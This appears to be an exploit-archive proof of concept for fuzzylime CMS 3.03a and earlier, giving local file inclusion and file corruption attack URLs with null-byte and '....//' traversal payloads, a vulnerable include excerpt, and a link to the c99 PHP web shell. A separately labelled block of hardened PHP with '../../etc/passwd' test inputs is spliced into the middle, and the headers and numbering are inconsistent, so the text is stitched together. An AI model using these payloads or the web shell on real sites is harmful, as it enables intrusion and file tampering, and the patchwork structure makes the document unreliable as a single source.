
fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC






+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker |
+-----------+---------------------+
 Author :  xhaxkerx
 Special Thankz : yasin
site : http://www.c99.mobi
+---------------------------------+


[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion, magic_quotes_gpc=off)
-----------------------------------------------------------------
 1. http://[target]/[path]/code/display.php?template= {file + nullbyte}

Vulnerable code: display.php (local file inclusion, magic_quotes_gpc=0 & register_globals=on)
--------------------------------------------------------------------
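// display.php, line 98: $template arrives from the request via register_globals
// and reaches include without validation
if($_GET['print'] != "1") include "templates/${template}_f.php";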
--------------------------------------------------------------------
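
Added example, not part of the original advisory and not fuzzylime code: one way to harden the include shown above by allowlisting the template name and checking that the resolved path stays inside the template directory. The function name resolve_template(), the temporary directory and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Hardened replacement for the unvalidated template include (added example).
// resolve_template() and the directory layout are hypothetical.

function resolve_template(string $name, string $baseDir): ?string
{
    // Allowlist the name itself: slashes, dots and NUL bytes cannot pass,
    // so "../" traversal and null-byte truncation are rejected up front.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '_f.php');
    if ($base === false || $path === false) {
        return null; // directory or template file does not exist
    }

    // Containment check after symlinks are resolved.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample inputs, run against a throwaway template directory.
$dir = sys_get_temp_dir() . '/tpl_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/default_f.php', "<?php // footer\n");

$samples = ['default', '../../etc/passwd', "default\0", 'missing', ''];
foreach ($samples as $s) {
    $resolved = resolve_template($s, $dir);
    printf("%-24s => %s\n",
        json_encode($s, JSON_UNESCAPED_SLASHES),
        $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}

unlink($dir . '/default_f.php');
rmdir($dir);
```

In the application, the name would be read explicitly from $_GET rather than through register_globals, and include would only be called when resolve_template() returns a path.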




[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=....//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte} (magic_quotes_gpc = off)

Vulnerable code: display.php (local file corruption, register_globals=1)
-----------------------------------------------------------------
  1. http://www.c99.mobi/c99.txt


[x] http://www.youtube.com/watch?v=h3DQmJOkSY0 

